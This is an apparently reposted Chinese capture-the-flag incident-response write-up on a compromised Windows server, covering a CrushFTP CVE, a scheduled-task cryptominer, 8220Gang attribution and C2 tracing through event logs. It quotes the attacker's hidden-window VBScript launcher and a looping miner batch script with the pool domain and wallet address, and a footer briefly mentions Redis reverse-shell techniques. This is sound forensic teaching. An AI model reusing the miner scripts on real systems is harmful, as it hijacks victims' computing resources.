Solar月賽(應急響應)——攻擊者使用什么漏洞獲取了服務器的配置文件?

某某文化有限公司的運維小王剛剛搭建服務器發現cpu莫名的異常的升高請你幫助小王排查一下服務器。

文章目錄

    • 事件介紹
    • 事件1:幫助小王找到是什么漏洞?
    • 事件2:系統每天晚上系統都會卡卡的幫小明找到問題出在了那?
    • 事件3:惡意域名是什么?
    • 事件4:疑似是什么組織發動的攻擊?
    • 事件5:攻擊者C2服務器IP是什么?
    • 總結


事件介紹

起因:某某文化有限公司的運維小王剛剛搭建服務器發現cpu莫名的異常的升高請你幫助小王排查一下服務器。
幫助小王找到是什么漏洞導致了小王的運維生涯受到了打擊?(回答攻擊者利用的漏洞編號)

主機pass:Ngy@667788
flag格式為:flag{CVE-2020-12345}

相關資料下載:
鏈接: https://pan.baidu.com/s/1vAXXygEwdhXtLeoF8yA6KA?pwd=9d97 提取碼: 9d97

解壓密碼:MWhEYGjaHkjk3UkE


事件1:幫助小王找到是什么漏洞?

首先我們打開下載的鏡像文件放到虛擬機里運行,發現是一臺Windows 10 Server的服務器:

在這里插入圖片描述

根據題目的 ”幫助小王找到是什么漏洞?“ ,我們可以發現桌面有幾個文件,打開看一下;

在瀏覽器里搜索兩個文件的名字,可以發現這兩個都是CVE漏洞:

在這里插入圖片描述
在這里插入圖片描述
輸入flag后發現都不對,然后我也是問AI他們各自都有哪些CVE漏洞,最后也是找到了CrushFTP的一個CVE漏洞符合:
在這里插入圖片描述

flag{CVE-2025-31161}

事件2:系統每天晚上系統都會卡卡的幫小明找到問題出在了那?

根據題目的 ”剛剛搭建服務器發現cpu莫名的異常的升高“ ,我們可以想到要么是開機啟動項存在可疑任務,或者就是計劃任務存在挖礦程序。

在這里插入圖片描述

根據上述這些思路,我們可以進行相應的排查:

(1)計劃任務檢查

  • 首先在搜索框任務計劃程序 查看有哪些可疑的進程正在運行;
  • 單擊【開始】>【設置】>【控制面板】>【任務計劃程序】;
  • 單擊【開始】>【運行】,輸入 “cmd”,然后在命令提示符窗口中輸入 “schtasks.exe

在這里插入圖片描述

(2)檢查開機啟動項:

  • 單擊【開始】>【所有程序】>【啟動】,默認情況下此目錄為空;
  • 單擊【開始】>【運行】,輸入 “msconfig”,在彈出的窗口中切換到 “啟動” 選項卡,查看是否存在命名異常的啟動項目。若有,取消勾選該項目,并根據命令中顯示的路徑刪除對應的文件。

在這里插入圖片描述

(當然上述這些方法可能都太麻煩了,有沒有更簡單的辦法。)

有的,這時候我們也可以使用工具幫助我們進行排查:

我個人一般使用 D盾Autoruns 來進行相應的檢查

話不多說,直接執行這兩個程序(標紅的表示可能是惡意程序或者計劃任務)

也是發現了部分異樣:計劃任務
在這里插入圖片描述

資源管理器:
在這里插入圖片描述

然后也是找到了惡意的計劃任務sql

在這里插入圖片描述
sql backing up就是導致每晚卡頓的原因

flag{sqlbackingup}

事件3:惡意域名是什么?

根據之前的發現,繼續在這個文件夾里發掘看看還有什么收獲。

在這里插入圖片描述

set ws=createobject("wscript.shell")
ws.Run """sqlwscript.cmd""",0
  • set ws=createobject(“wscript.shell”)

    • createobject("wscript.shell"):創建一個 WScript.Shell 對象的實例。這個對象能讓腳本與 Windows 操作系統進行交互,例如執行程序、創建快捷方式、讀寫注冊表等。
    • set ws = ...:把創建好的 WScript.Shell 對象賦值給變量ws,方便后續使用。
  • ws.Run “”“sqlwscript.cmd”“”,0

    • ws.Run ...:調用 WScript.Shell 對象的Run方法來執行外部程序或腳本。
    • """sqlwscript.cmd""":要執行的命令。這里使用三重引號是為了正確處理路徑中可能存在的空格。第一個和第三個引號是 VBScript 字符串的定界符,中間的兩個引號會被解析為批處理文件路徑里的一個引號。
    • ,0:Run方法的第二個參數,表示窗口樣式。值為 0 時,意味著程序會在后臺運行,也就是不會顯示窗口。

接下來再查看sqlwscript這個腳本:

在這里插入圖片描述

代碼如下:

@echo off
cd /d "%~dp0"
:start
sqlwpr.exe -a rx/0 --url b.oracleservice.top --user 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -t 0
goto start

從上面我們可以看到惡意的url了:

flag{b.oracleservice.top}

事件4:疑似是什么組織發動的攻擊?

然后在文件夾發現一個應用程序sqlwpr,對剛才的代碼進行分析:

  1. 基礎設置:
    • @echo off:使命令執行過程不在控制臺顯示,保持界面干凈。
    • cd /d "%~dp0":將工作目錄切換到腳本所在目錄,確保后續操作路徑無誤。
  2. 挖礦主循環:
    • :start和goto start構成無限循環,讓挖礦程序持續運行。
    • sqlwpr.exe -a rx/0 --url b.oracleservice.top --user ... -t 0:調用挖礦程序進行加密貨幣挖掘。其中:
    • -a rx/0:采用 RandomX 算法,常用于門羅幣(XMR)等加密貨幣的挖掘。
    • –url b.oracleservice.top:連接到指定的礦池服務器,該服務器域名顯示與 Oracle 無關,是用于接收挖礦算力的遠程地址。
    • --user ...:使用的礦工賬戶,是一個較長的字符串,用于標識挖礦收益的歸屬。
      - -t 0:設置線程數為 0,意味著程序會自動使用所有可用 CPU 核心,這會使 CPU 使用率大幅上升。

隨后搜索惡意域名,發現具體的組織:
在這里插入圖片描述
在這里插入圖片描述

flag{8220Gang}

事件5:攻擊者C2服務器IP是什么?

查看挖礦程序的上傳時間,確定時間大概在2025.5.27 23:20:00左右

在這里插入圖片描述

隨后在Win + R 喚出cmd,然后輸入eventvwr.msc 打開系統日志管理:

在這里插入圖片描述
查詢windows的安全日志,篩選 5156 事件(Windows 過濾平臺放行連接),逐一查詢這段時間之后powershell的出戰痕跡

在這里插入圖片描述

隨后也是找到了相應的IP地址。具體如何篩選可以看這篇文章:Windows日志分析

當然,也可以直接導出篩選日志進行關鍵詞搜索

將已篩選的日志導出為txt文件,然后直接搜索powershell.exe關鍵詞,找出可疑的出站目的IP地址,即為C2服務器IP。

flag{156.238.230.57}

總結

沒什么好說的,多學多練多復習。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/93484.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/93484.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/93484.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

高頻面試題

1.HashMap的底層原理JDK1.7版本之前,HashMap的底層數據結構是數組鏈表,HashMap通過哈希算法會將元素的key映射待數組的的槽位(Bucket)。如果多個鍵映射到同一個槽位,就會以鏈表的形式存儲在同一個槽位上。但是鏈表的查詢的復雜度O(n),所有沖突…

魚皮項目簡易版 RPC 框架開發(四)

本文為筆者閱讀魚皮的項目 《簡易版 RPC 框架開發》的筆記,如果有時間可以直接去看原文, 1. 簡易版 RPC 框架開發 前面的內容可以筆者的前面幾篇筆記 魚皮項目簡易版 RPC 框架開發(一) 魚皮項目簡易版 RPC 框架開發(二…

力扣-79.單詞搜索

題目鏈接 79.單詞搜索 class Solution {int m, n;public boolean exist(char[][] board, String word) {m board.length;n board[0].length;boolean[][] visited new boolean[m][n];// 遍歷網格中的每個單元格作為搜索起點for (int i 0; i < m; i) {for (int j 0; j …

LabVIEW的To More Specific Class功能說明

?To More Specific Class 是 LabVIEW 中用于控件引用類型轉換的關鍵函數。可將通用 GObject 引用&#xff0c;精準轉為 Listbox、TreeControl 等特定控件類引用&#xff0c;讓開發者能調用專屬屬性&#xff08;如獲取列表行數&#xff09;&#xff0c;實現對不同控件類的差異化…

Ubuntu20.04安裝和配置Samba實現Win11下共享文件夾

Samba是在Linux和UNIX系統上實現 SMB / CIFS 協議的開源軟件&#xff0c;主要用于局域網內的文件共享和打印服務。Samba通過SMB/CIFS協議實現跨平臺資源共享&#xff0c;支持匿名用戶和本地用戶訪問共享目錄&#xff0c;客戶端主要為Windows系統。其核心進程包括&#xff1a; ?…

設計模式(八)結構型:橋接模式詳解

設計模式&#xff08;八&#xff09;結構型&#xff1a;橋接模式詳解橋接模式&#xff08;Bridge Pattern&#xff09;是 GoF 23 種設計模式中的結構型模式之一&#xff0c;其核心價值在于將抽象部分與實現部分分離&#xff0c;使它們可以獨立變化。它通過“組合”而非“繼承”…

【邊緣填充】——圖像預處理(OpenCV)

目錄 1 邊界復制&#xff08;BORDER_REPLICATE&#xff09; 2 邊界反射&#xff08;BOEDER_REFLECT&#xff09; 3 邊界反射101&#xff08;BORDER_REFLECT101&#xff09; 4 邊界常數&#xff08;BORDER_CONSTANT&#xff09; 5 邊界包裹&#xff08;BORDER_WRAP&#xf…

git同步到github出錯-幾個問題-一天晚上(2025.7.29)

訪問不了github 代理和加速器都正常&#xff0c;但是就是訪問不了這個網站嘗試過幾種方法都不行&#xff0c;后面突然可以了。 之后發現一種情況會不行&#xff1a;同時開啟 同步不了 http連接 https://blog.csdn.net/m0_73972962/article/details/146198392 一堆問題 ssh連接才…

Redis未授權訪問的利用的幾種方法原理以及條件

一、redis通過定時任務反彈shell1.利用條件&#xff1a;需要能夠登錄redis數據庫&#xff0c;并且redis以root用戶運行。同時/var/spool/cron目錄要具有寫和執行權限。二、Redis主從getshell1.原理&#xff1a;在Redis 4.x之后&#xff0c;Redis新增了模塊功能&#xff0c;通過…

DNF 與 YUM 的區別詳解:從 CentOS 7 到 CentOS 9 的演進

&#x1f365; DNF 與 YUM 的區別詳解&#xff1a;從 CentOS 7 到 CentOS 9 的演進標簽&#xff1a;CentOS、YUM、DNF、Linux 包管理、系統升級、兼容性 適用版本&#xff1a;CentOS 7、CentOS 8、CentOS 9&#x1f9e9; 一、背景介紹 CentOS 中使用的包管理工具是 RedHat 系列…

mp核心功能

條件構造器mybatisPlus支持各種復雜的where條件, 滿足日常的開發wrapper類就是條件構造器提供了很多子類條件構造器的用法&#xff1a;QueryWrapper和LambdaQueryWrapper通常用來構建select、delete、update的where條件部分UpdateWrapper和LambdaUpdateWrapper通常只有在set語句…

pcm,msd調制解調仿真

PCM&#xff08;脈沖編碼調制&#xff09;和MSD&#xff08;多符號差分&#xff09;調制解調系統的MATLAB仿真代碼。 PCM (脈沖編碼調制) 仿真 %% PCM調制解調仿真 clear; clc; close all;% 參數設置 Fs 8000; % 采樣頻率 (Hz) t_duration 0.02; % 信號持續時間 (秒…

【網絡安全】信息網絡安全建設方案(WORD)

1.1 安全整體架構 1.2 安全建設拓撲 1.3 安全建設內容與目標 2.1 用戶側安全建設思路 2.2 用戶側安全建設拓撲 2.3 用戶側安全建設內容 2.3.1 PKI 升級改造 2.3.2 安全防護 2.3.3 安全檢測 2.3.4 安全管理 3.1 跨網安全訪問與交換平臺安全建設思…

微服務 01

微服務是一種軟件架構風格&#xff0c;它是以專注于單一職責的很多小型項目為基礎&#xff0c;組合出復雜的大型應用。 &#xff08;對應的是單體架構風格&#xff09; 一、認識微服務 1、單體架構 單體架構&#xff1a;將業務的所有功能集中在一個項目中開發&#xff0c;打…

20250726讓榮品的PRO-RK3566開發板使用TF卡啟動

20250726讓榮品的PRO-RK3566開發板使用TF卡啟動 2025/7/26 8:58緣起&#xff1a;需要升級 榮品的PRO-RK3566核心板的 底板上的FPGA程序。 由于沒有使用RK809的電量計功能&#xff0c;板子一上電就會被關機&#xff01;^_于是給生產線制作了一張TF卡/啟動卡&#xff0c;插到底板…

Selenium使用指南

&#x1f345; 點擊文末小卡片&#xff0c;免費獲取軟件測試全套資料&#xff0c;資料在手&#xff0c;漲薪更快 概述selenium是網頁應用中最流行的自動化測試工具&#xff0c;可以用來做自動化測試或者瀏覽器爬蟲等。官網地址為&#xff1a;相對于另外一款web自動化測試工具QT…

[機緣參悟-235]:通過AI人工升級網絡的工作方式和特征理解人的思維方式

AI人工神經網絡通過模擬生物神經元連接機制、構建層級化特征提取結構&#xff0c;并結合數據驅動的學習方式&#xff0c;為理解人類思維方式提供了技術參照框架&#xff0c;但其本質仍是基于統計的模式匹配&#xff0c;與人類意識層面的思維存在根本差異。以下從其工作方式、基…

【C#補全計劃:類和對象(七)—— 重寫虛方法】

一、virtual和override1. 問題引入&#xff1a;使用里氏替換原則時&#xff0c;使用父類容器裝載子類對象&#xff0c;若不使用virtual和override而是使用new&#xff0c;當子類調用兩個類共有的方法時&#xff0c;調用的是父類的方法而不是子類的方法&#xff1a;using System…

TCPIP之常用協議

一、TCPIP之網絡支撐協議 1.ARP ARP是網絡層協議&#xff0c;在同一廣播域內&#xff0c;將IP地址解析成MAC地址. 1.1 無故ARP 請求型無故ARP 設備在網絡中不管是自動獲取ip地址還是手動配置ip地址&#xff0c;設備都會發送請求型無故ARP檢查這個ip地址是否有重復的。 應…

網絡之路24:VLAN基礎實驗

正文共&#xff1a;2345 字 18 圖&#xff0c;預估閱讀時間&#xff1a;3 分鐘目錄網絡之路第一章&#xff1a;Windows系統中的網絡0、序言1、Windows系統中的網絡 1.1、桌面中的網卡 1.2、命令行中的網卡 1.3、路由表 1.4、家用路由器網絡之路第二章&#xff1a;認識企業設備2…